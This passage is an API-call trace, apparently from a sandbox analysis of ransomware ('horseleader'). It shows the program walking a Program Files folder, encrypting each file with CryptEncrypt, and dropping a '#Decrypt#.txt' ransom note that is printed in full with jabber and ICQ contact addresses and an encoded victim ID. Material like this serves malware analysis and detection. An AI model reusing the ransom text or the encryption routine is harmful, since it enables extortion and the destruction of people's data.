[0251.503] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.504] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe64ba3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe64ba3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.504] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.504] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png") returned 87 [0251.504] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.504] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.504] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.504] lstrlenW (lpString=".testttjffg") returned 11 [0251.504] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.504] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.504] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.504] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.505] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe8ad00, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe8ad00, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.505] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.505] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png") returned 93 [0251.505] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.505] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.505] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.505] lstrlenW (lpString=".testttjffg") returned 11 [0251.505] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.506] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.506] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.506] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.507] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdf278c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fdf278c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5fc8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="pagecurl.png", cAlternateFileName="")) returned 1 [0251.507] lstrcmpiW (lpString1="pagecurl.png", lpString2="Windows") returned -1 [0251.507] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png") returned 69 [0251.507] StrStrIW (lpFirst="pagecurl.png", lpSrch=".horseleader") returned 0x0 [0251.507] lstrcmpW (lpString1="pagecurl.png", lpString2="#Decrypt#.txt") returned 1 [0251.507] lstrcmpW (lpString1="pagecurl.png", lpString2="_uninstalling_.png") returned 1 [0251.507] lstrlenW (lpString=".testttjffg") returned 11 [0251.507] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png", lpSrch=".testttjffg") returned 0x0 [0251.507] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.507] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.507] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\pagecurl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.507] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdf278c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fdf278c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5fc8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="pagecurl.png", cAlternateFileName="")) returned 0 [0251.507] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.508] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\#Decrypt#.txt") returned 70 [0251.508] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.510] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.510] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.511] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.511] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.511] CloseHandle (hObject=0x158) returned 1 [0251.511] GetProcessHeap () returned 0x780000 [0251.512] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.512] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa63097e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a65ec8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Full", cAlternateFileName="")) returned 1 [0251.512] lstrcmpiW (lpString1="Full", lpString2="Windows") returned -1 [0251.512] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 52 [0251.512] lstrcmpW (lpString1="Full", lpString2=".") returned 1 [0251.512] lstrcmpW (lpString1="Full", lpString2="..") returned 1 [0251.512] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.512] GetProcessHeap () returned 0x780000 [0251.512] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.512] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*") returned 54 [0251.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa63097e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a65ec8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.515] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.515] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\.") returned 54 [0251.515] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.515] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa63097e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a65ec8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.515] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.515] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\..") returned 55 [0251.516] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.516] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.516] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f12724e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f12724e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.516] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.516] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png") returned 70 [0251.516] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.516] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.516] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.516] lstrlenW (lpString=".testttjffg") returned 11 [0251.516] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.516] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.516] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.516] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.517] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f173508, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f173508, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.517] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.517] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png") returned 65 [0251.517] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.517] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.517] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.517] lstrlenW (lpString=".testttjffg") returned 11 [0251.517] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.517] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.518] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.518] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.518] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f20ba7c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f20ba7c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11d3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="dotsdarkoverlay.png", cAlternateFileName="")) returned 1 [0251.519] lstrcmpiW (lpString1="dotsdarkoverlay.png", lpString2="Windows") returned -1 [0251.519] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png") returned 72 [0251.519] StrStrIW (lpFirst="dotsdarkoverlay.png", lpSrch=".horseleader") returned 0x0 [0251.519] lstrcmpW (lpString1="dotsdarkoverlay.png", lpString2="#Decrypt#.txt") returned 1 [0251.519] lstrcmpW (lpString1="dotsdarkoverlay.png", lpString2="_uninstalling_.png") returned 1 [0251.519] lstrlenW (lpString=".testttjffg") returned 11 [0251.519] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png", lpSrch=".testttjffg") returned 0x0 [0251.519] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.519] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.519] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotsdarkoverlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.523] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f20ba7c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f20ba7c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x123d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="dotslightoverlay.png", cAlternateFileName="")) returned 1 [0251.523] lstrcmpiW (lpString1="dotslightoverlay.png", lpString2="Windows") returned -1 [0251.523] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png") returned 73 [0251.523] StrStrIW (lpFirst="dotslightoverlay.png", lpSrch=".horseleader") returned 0x0 [0251.523] lstrcmpW (lpString1="dotslightoverlay.png", lpString2="#Decrypt#.txt") returned 1 [0251.524] lstrcmpW (lpString1="dotslightoverlay.png", lpString2="_uninstalling_.png") returned 1 [0251.524] lstrlenW (lpString=".testttjffg") returned 11 [0251.524] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png", lpSrch=".testttjffg") returned 0x0 [0251.524] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.524] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotslightoverlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.524] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f12724e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f12724e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6794, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="full.png", cAlternateFileName="")) returned 1 [0251.524] lstrcmpiW (lpString1="full.png", lpString2="Windows") returned -1 [0251.524] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png") returned 61 [0251.524] StrStrIW (lpFirst="full.png", lpSrch=".horseleader") returned 0x0 [0251.524] lstrcmpW (lpString1="full.png", lpString2="#Decrypt#.txt") returned 1 [0251.524] lstrcmpW (lpString1="full.png", lpString2="_uninstalling_.png") returned 1 [0251.524] lstrlenW (lpString=".testttjffg") returned 11 [0251.524] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png", lpSrch=".testttjffg") returned 0x0 [0251.524] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.525] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.525] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\full.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.525] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1bf7c2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f1bf7c2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, 